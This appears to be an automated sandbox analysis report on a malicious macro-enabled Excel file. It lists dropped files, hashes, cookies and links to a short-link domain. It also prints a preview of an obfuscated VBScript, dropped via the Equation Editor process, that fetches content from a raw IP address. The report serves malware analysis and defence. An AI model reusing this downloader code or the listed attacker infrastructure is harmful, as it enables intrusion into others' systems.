Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFE0FBB2FDB2FD1126.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.21353050977004628
Encrypted:	false
SSDEEP:	6:BW1Y/+OpGR1Vs1NEMin/RyG80/oSKibg7OyTDSrXDfVROFXJtwAa28l:Q1Ye7yNkn/Ry0/oCg7labDqFXJtwC0
MD5:	F30E6DC9C7BD5725D6F2169927E609CE
SHA1:	81BB3E7854C987390857B82CC8CC956F647AD5C5
SHA-256:	B2F35146FC61275B7F623F6FFE09372CC7009E512E78B156B7C841A71EA92C14
SHA-512:	F3BE45FD0A6D28B3E655382FE180E0331EAA52FC40AFA16DF2A83589091D0429E1655E5C82EC9D7BE20D7E717CBA4545477C2045FA8EF12CA2E9068934740B5D
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1RxrR6.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://woi.gg/1RxrR6>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.571943749300114
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/0Kwtnkv:HRYFVm/zKkv
MD5:	84C8F974F2C3FBEA3A3B1F289D9B51D2
SHA1:	5FFF48304031FD056BF88304B9892F833A59A34F
SHA-256:	9B97C72DE6F71B01D64AC3955476FE074C6C508C5AFC8495FA70BC0B4A1E1090
SHA-512:	71922BC64D2FBAD99C052F95294E053A9DD3024B4B7B19993EBE7637F47C7FB5CA4D89472E362F0F411E69D675DE5A8A483A1955BB565F14EA48D86A4E60E327
Malicious:	true
Preview:	[InternetShortcut]..URL=http://woi.gg/1RxrR6..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [xls]
Category:	modified
Size (bytes):	110
Entropy (8bit):	4.872700595201542
Encrypted:	false
SSDEEP:	3:bDCC9CCS8iFLUmMw8iFLUv:bvgV8sLmw8sL2
MD5:	7C3CB040820A1C84C61954F525223C9A
SHA1:	EF8A775D102B650DE6820B10A43F7CA9C6DB7702
SHA-256:	54D7136D172CEC14ACBFBA65387648D2FBD2DE717A7FCBD5D3D27BE9273E251D
SHA-512:	403FEDFFE72E7CDB72500CAC4EE127B030BC8583D4E5B9A805D38F1EA89D8286C15CEBDACE17E8DEF0102032034159BC1CC114AFBB2FB15EADAAD4927A45EBE3
Malicious:	false
Preview:	[folders]..1RxrR6.url=0..woi.gg.url=0..Swift tract-20240506_120.LNK=0..[xls]..Swift tract-20240506_120.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\woi.gg.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://woi.gg/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.415311532225102
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/0Ku:HRYFVm/zu
MD5:	20DB6D7CF2CF4FD43D9B0FEF542713CC
SHA1:	EC03BE0C125A4FA4688DFF4ED6B9A3A9EA146BA7
SHA-256:	489688A7ECF1B237D60865009CF00A9D14040900178EF24DD4F6940E9E7FF89C
SHA-512:	BAE4794BF8BBFA6A093D187829CD09003D2762EB2F38E6B1D00D7580F3D9E7793E8FB42B8ED3372B722250A58BE3F6B382A2B7C25D00D7275308954DF0044918
Malicious:	true
Preview:	[InternetShortcut]..URL=http://woi.gg/..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyZbHigAWvCGkJU2lln:vdsCkWtyjigDzXKl
MD5:	149A07C771DCBEC7963281041D02A4E6
SHA1:	A0E70DB2FF3DE3B764B29DE2E34241B423F3A473
SHA-256:	3A3A1498C9FD6DA3DCDA7F682BE2E38B72D21F5FBC492AADE492FACCCAA8D387
SHA-512:	2784EC471F04A9625097B967B2FDB42E5FE28F459B7EB6D1F36B656C2B7C26EF32DE50D852CE02198CA88739548C50AD8A471AAF0C856092A878D50931640E3C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\GKICFQZW.txt

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with very long lines (342)
Category:	dropped
Size (bytes):	409
Entropy (8bit):	5.739083088867011
Encrypted:	false
SSDEEP:	12:uJX1Y2wSjS0cUnLQJXEkitk0LwwyCsWCndCn:uJhNQJXRZ0swmtndC
MD5:	F5E34F0A67D1D4C78048A31190863328
SHA1:	BCD728254DE0AB15D50F2B2F3C5D7093033862FA
SHA-256:	6C553918A04DDAC308CBF5CC349430CD9FBDD42F6B9A42046497FD80068E7A63
SHA-512:	35339BD6D17904CF4004236C12DF4D909886977598DDA329B93645C4E0C1E2C7E2C4E35803950355B5062DF955D74A58435A963751EDA6D85F5C2842D92D829D
Malicious:	false
Preview:	XSRF-TOKEN.eyJpdiI6IlU1Y1AzTG1FT21aZ253akE2VGp6Mnc9PSIsInZhbHVlIjoieWhyZVVqQ3V4aXdCNmxxVUtITDRyc3ZwY1lSNGFjdlZhM09rdmoxU3cyNmVnYU04T3ZGNW1GZzlWbjlwVjJvSXArWnBCcVZ3TzROSUJZcU5jZnlpR3B3eHVYT0xjL3hvWllDay9aS0Z6TEpscDFRaWVnSXgxREJlRk0zbmdhZFciLCJtYWMiOiIzOTE2NThjNTA3ZmRkYzhjMTIzNDQwOWYwMWJjY2YwMTExNWNlMzFhMWQ1ZDUyY2RlZmM5NmUxMmQxYmRkMjZjIiwidGFnIjoiIn0%3D.woi.gg/.1536.1074419584.31116971.2088678305.31116954.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\IZIJHAHD.txt

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with very long lines (342)
Category:	dropped
Size (bytes):	819
Entropy (8bit):	5.761590269587748
Encrypted:	false
SSDEEP:	24:uJhNQJXRZ0swmtndBbTdHbgFNxnXCLyzncqC:2NQvSeZbTF0FbSLy0
MD5:	52E0CEED0C4E6B8A0C10769E80A0DA33
SHA1:	A35EB8E0ECB5794D6A0ACF28BDF6E73C58072A3E
SHA-256:	A905E7F8A3506B6FB6DB18A0392B683FCCDCDCB34AC4751AF7D79A4747257235
SHA-512:	0B27F2254CEDAB8C39129096533E767C188DEA8E4FB7DA69C7AA05214C4CE9061456E5DA9B43481D4886D3E556E7EEFE92C256575EE6A278EA79F5DBD7DB74C7
Malicious:	false
Preview:	XSRF-TOKEN.eyJpdiI6IlU1Y1AzTG1FT21aZ253akE2VGp6Mnc9PSIsInZhbHVlIjoieWhyZVVqQ3V4aXdCNmxxVUtITDRyc3ZwY1lSNGFjdlZhM09rdmoxU3cyNmVnYU04T3ZGNW1GZzlWbjlwVjJvSXArWnBCcVZ3TzROSUJZcU5jZnlpR3B3eHVYT0xjL3hvWllDay9aS0Z6TEpscDFRaWVnSXgxREJlRk0zbmdhZFciLCJtYWMiOiIzOTE2NThjNTA3ZmRkYzhjMTIzNDQwOWYwMWJjY2YwMTExNWNlMzFhMWQ1ZDUyY2RlZmM5NmUxMmQxYmRkMjZjIiwidGFnIjoiIn0%3D.woi.gg/.1536.1074419584.31116971.2088678305.31116954..woi_session.eyJpdiI6Im5jbFJGS3A4NVNJSW45clZpSHVFOXc9PSIsInZhbHVlIjoiNU9nMjhKMUlTK0NDSVhXeWpmaUZLVWdsVE5ucjRENFMxaUxDT0ZKc2lUYzIvWU1pZmlreDg4RVJWMDdaR01pQ21rTE9YM0ptb1o1c1dsdFJyVlVaRlVRM0NYOWIxQWFxYTlvVGRPVEZkT1liREhBUFoyeG80d1dMRGRLMzRBWjgiLCJtYWMiOiIwZmQxMzk0MTY1YmIyNzk3NTFiNmNlODk5YmM2NjJkZWE5NWJlZjUwNjJjN2IwNzRlYTJiMDc0MjUwNjM0MGYyIiwidGFnIjoiIn0%3D.woi.gg/.9728.1074419584.31116971.2088834358.31116954..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MR19GKGX.txt

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with very long lines (342)
Category:	dropped
Size (bytes):	819
Entropy (8bit):	5.741542622774694
Encrypted:	false
SSDEEP:	24:uwrV0MDf3ZNanNFGtBP2Bovm0WcxMHRWnNFGC:Nh/Df3Ze6BP2BoQc++5
MD5:	1D9859EB506ED5AE58F4CD51C1C58204
SHA1:	C106518818B65F610F665F3CB50213E66713A332
SHA-256:	10548296A1654AE25C90FD6F0DECC4D8BD87F6FE187A376122A7E740E0B6C42A
SHA-512:	1F726B8C562DF40D78A38979C5E9E3084991C2E9E15094D09F4EA8BCBDB08D89CE84A0D92B015CB720296C80494C2D9240F291CF625223B056F8974B08CCB447
Malicious:	false
Preview:	XSRF-TOKEN.eyJpdiI6Ikt0QmlJSWNRbTdrbFJQRENXeXB1Unc9PSIsInZhbHVlIjoiVjZ2Qk5BUndobTdsSzQ5ZHlJQVVGRWp1cGtUOVpFOUxrSmtjMEozN3MySjROTXFJdzlwMFdsakhNRmd5ZGkyMFNuVWdZSTJpTGdiTVY5d2h5OEUyZUdMcDZCdDQzc1BlcnQ2QUh4K0ZzUkN3eTRNbVJsNm94QURIaTl2dDdVRmQiLCJtYWMiOiI3Zjc2Y2MwMTI1YWYwMTFjNTQxMTE3MTY5NzU2Y2M0MmViNDI1MjBlMjgxYjI1MzA3ZjdiNjBjMzVjNjg4ZWI1IiwidGFnIjoiIn0%3D.woi.gg/.1536.1194419584.31116971.2207491768.31116954..woi_session.eyJpdiI6IjhYZkUzN0RxcXlpNzFBN09OUTdDbFE9PSIsInZhbHVlIjoibFVrc3UzTUEwU3dqUlM5KzdoOHZGZkRCS3p0dUxlM1pHVWJ6ajFSYSt5bTJtWDJzYWU1YUphWkVvKzNNVEcyUnFIYjcrUUlXVXRJSCsyWlozT3hnamV2Q0doWkIwai9xblhpSk1WVnIxZkt4bk1VMlNPLzBieExZbTNjMlNqWmIiLCJtYWMiOiI3OWZmNGM2Y2FmNmIyYzEyMzk0N2QyYzBjMmNhY2U2NTE0YmI0OWNmYzliMWYyNTEyYTdiY2JmYTUwNzY4NDM5IiwidGFnIjoiIn0%3D.woi.gg/.9728.1194419584.31116971.2207491768.31116954..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\PWXY508K.txt

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with very long lines (342)
Category:	dropped
Size (bytes):	819
Entropy (8bit):	5.735909582119635
Encrypted:	false
SSDEEP:	24:uwrV0MDf3ZNanNFGBbTdHbgFNxnXCLyzncqC:Nh/Df3Ze0bTF0FbSLy0
MD5:	8A28E8AE2D51187862EC0051959C633F
SHA1:	336300B443EA2426709B4BCB5B5417E4565E5629
SHA-256:	6EED5DA6A3974D580215FB5204242256D04F5F2BF05ED907056BB73E82519C2D
SHA-512:	DFD337C8F6D74DB1094BD240856B46B7FCC635CF069C1719720570CDE640B7C8BD3B2DDE1951B731F610523C0BD17A0532CFC94D0A4851FDAFFECA3EFAB3097E
Malicious:	false
Preview:	XSRF-TOKEN.eyJpdiI6Ikt0QmlJSWNRbTdrbFJQRENXeXB1Unc9PSIsInZhbHVlIjoiVjZ2Qk5BUndobTdsSzQ5ZHlJQVVGRWp1cGtUOVpFOUxrSmtjMEozN3MySjROTXFJdzlwMFdsakhNRmd5ZGkyMFNuVWdZSTJpTGdiTVY5d2h5OEUyZUdMcDZCdDQzc1BlcnQ2QUh4K0ZzUkN3eTRNbVJsNm94QURIaTl2dDdVRmQiLCJtYWMiOiI3Zjc2Y2MwMTI1YWYwMTFjNTQxMTE3MTY5NzU2Y2M0MmViNDI1MjBlMjgxYjI1MzA3ZjdiNjBjMzVjNjg4ZWI1IiwidGFnIjoiIn0%3D.woi.gg/.1536.1194419584.31116971.2207491768.31116954..woi_session.eyJpdiI6Im5jbFJGS3A4NVNJSW45clZpSHVFOXc9PSIsInZhbHVlIjoiNU9nMjhKMUlTK0NDSVhXeWpmaUZLVWdsVE5ucjRENFMxaUxDT0ZKc2lUYzIvWU1pZmlreDg4RVJWMDdaR01pQ21rTE9YM0ptb1o1c1dsdFJyVlVaRlVRM0NYOWIxQWFxYTlvVGRPVEZkT1liREhBUFoyeG80d1dMRGRLMzRBWjgiLCJtYWMiOiIwZmQxMzk0MTY1YmIyNzk3NTFiNmNlODk5YmM2NjJkZWE5NWJlZjUwNjJjN2IwNzRlYTJiMDc0MjUwNjM0MGYyIiwidGFnIjoiIn0%3D.woi.gg/.9728.1074419584.31116971.2088834358.31116954..

C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3490
Entropy (8bit):	3.7408033098612847
Encrypted:	false
SSDEEP:	96:2toea9sitoeGtoe3WGwtoePtoeN9sqtoezcmcxchD9stcutoe+:2iT9vi3iYwi2ig9PikcmcxchD9Wcuin
MD5:	E86E99A78BD530A6DE63FBE95AD2B07E
SHA1:	42454AB6E23D61DAB2304F42D7CD9A89D693E7B0
SHA-256:	57F7D2614FD83C5EEB0D503BE7D0C0C8F611626011E23776763CA3E14151D8DF
SHA-512:	6778C6D244592EEAD17312D4FBA1917AC5DB6307806C7063DBD9492ED663D3A12EF842B6F44342E6B0D5A970A658BD2E49F1AF774ACABC29DE465ADA74045455
Malicious:	true
Preview:	..D.i.m. .C.d.i.q.c.n.a.G.W.p.W.s.S.x.i.G.k.R.G.h.c.e.L.L.Z.W.m.K.G.T.W.G.L.A.H.u.i.k.d.K.c.q.L.h.p.o.f.i.f.U.u.x.d.L.J.K.i.c.S.P.L.C.c.z.W.z.P.W.R.U.n.Q.t.d.N.U.o.Z.l.g.W.L.f.I.P.e.L.n.R.v.d.Z.P.W.K.B.j.L.b.e.,. .C.e.b.n.j.L.d.A.c.L.B.i.i.W.s.i.G.A.G.g.Z.N.Q.i.J.L.G.A.G.C.U.U.e.h.k.U.c.N.i.L.I.i.Q.W.i.i.G.L.U.z.W.v.W.i.b.i.e.r.O.K.A.e.W.k.P.m.Z.d.U.N.z.k.k.t.s.f.N.a.K.q.s.G.c.T.R.L.i.i.t.W.f.Z.O.z.x.W.I.L.G.G.....S.e.t. .C.d.i.q.c.n.a.G.W.p.W.s.S.x.i.G.k.R.G.h.c.e.L.L.Z.W.m.K.G.T.W.G.L.A.H.u.i.k.d.K.c.q.L.h.p.o.f.i.f.U.u.x.d.L.J.K.i.c.S.P.L.C.c.z.W.z.P.W.R.U.n.Q.t.d.N.U.o.Z.l.g.W.L.f.I.P.e.L.n.R.v.d.Z.P.W.K.B.j.L.b.e. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P.".).....C.d.i.q.c.n.a.G.W.p.W.s.S.x.i.G.k.R.G.h.c.e.L.L.Z.W.m.K.G.T.W.G.L.A.H.u.i.k.d.K.c.q.L.h.p.o.f.i.f.U.u.x.d.L.J.K.i.c.S.P.L.C.c.z.W.z.P.W.R.U.n.Q.t.d.N.U.o.Z.l.g.W.L.f.I.P.e.L.n.R.v.d.Z.P.W.K.B.j.L.b.e...O.p.e.n. .".G.E.T.".,. .".h.t.t.p.:././.9.1...9.2...2.5.4...1.4./.U.s.e.r.s._.A.P.I./.s.y.

C:\Users\user\Desktop\56630000

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 5 06:17:00 2024, Security: 1
Category:	dropped
Size (bytes):	201216
Entropy (8bit):	7.929694565119613
Encrypted:	false
SSDEEP:	3072:1yKbY64BEtJEN9ACgltcLTg/toCuwpy06EyhggUaNDd/kofgaTwuAKkpCF:jbY1BEtJ0XsPuwpyREFgUc/nVTwT
MD5:	E8ADEEE48D99D325D1E173953F9B1DBF
SHA1:	6B2B88E46D5EF0CD12D8D363D9DF865FF8C1341D
SHA-256:	3F7624B0B8D13FC0D7EBAAC0ACB747140CAD1440E32141459F6FD6D2BD5C37DA
SHA-512:	7C0A3EE7758225CC108C523AC4542F059414B67D37066C2E58B7B7B75E6B164DFBCE8176382A6727B0B3D89E1FD7A01BF4460DC75F18E6E3471B45BF29165407
Malicious:	false
Preview:	......................>...................................*...................l.......n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...............-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...m.......n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\56630000:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\Swift tract-20240506_120.xls (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 5 06:17:00 2024, Security: 1
Category:	dropped
Size (bytes):	201216
Entropy (8bit):	7.929694565119613
Encrypted:	false
SSDEEP:	3072:1yKbY64BEtJEN9ACgltcLTg/toCuwpy06EyhggUaNDd/kofgaTwuAKkpCF:jbY1BEtJ0XsPuwpyREFgUc/nVTwT
MD5:	E8ADEEE48D99D325D1E173953F9B1DBF
SHA1:	6B2B88E46D5EF0CD12D8D363D9DF865FF8C1341D
SHA-256:	3F7624B0B8D13FC0D7EBAAC0ACB747140CAD1440E32141459F6FD6D2BD5C37DA
SHA-512:	7C0A3EE7758225CC108C523AC4542F059414B67D37066C2E58B7B7B75E6B164DFBCE8176382A6727B0B3D89E1FD7A01BF4460DC75F18E6E3471B45BF29165407
Malicious:	true
Preview:	......................>...................................*...................l.......n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...............-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...m.......n...o...p...q...r...s...t...u...v...w...x...y...z...

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Jul 4 08:38:02 2024, Security: 1
Entropy (8bit):	7.828069363231443
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	Swift tract-20240506_120.xls
File size:	201'216 bytes
MD5:	fb22b045b53f0c53685afc2b17c9bca8
SHA1:	2f42c1e432515a89f6c8c7802bc45a89e171b4a2
SHA256:	b407cd499a77383c21bc590bca7ac0e44ed224aa39ac73ea0e904170891b3684
SHA512:	37b4d634f8c84105bfe5fed02a75338faab0f67def6bab94213132ba2f70498d027814ba9ccd05951482854c4259c8be50927296991eb8e7b7b11f1fac742e60
SSDEEP:	3072:fyKbN/z8CK+SRuVEFXHduAzoTZ1nO0AQznqdJGPHVVa5OMuD/TYKVyXkdl2:9bNAxJuVEBHsAzktAQzuq6LudVyUS
TLSH:	EE14021633A9D226F555AE3B0EC4D1CBAF2BFCA07D56C74330157B8F9A7E9821613109
File Content Preview:	........................>...................................*...................m..............................................................................................................................................................................

File Icon


Icon Hash:	276ea3a6a6b7bfbf

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "Swift tract-20240506_120.xls"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2024-07-04 07:38:02
Creating Application:	Microsoft Excel
Security:	1

Document Summary

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 f5 cc 10 b2 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 f5 cc 20 17 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 f5 cc 43 fb 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 985

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 f5 cc b1 b7 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
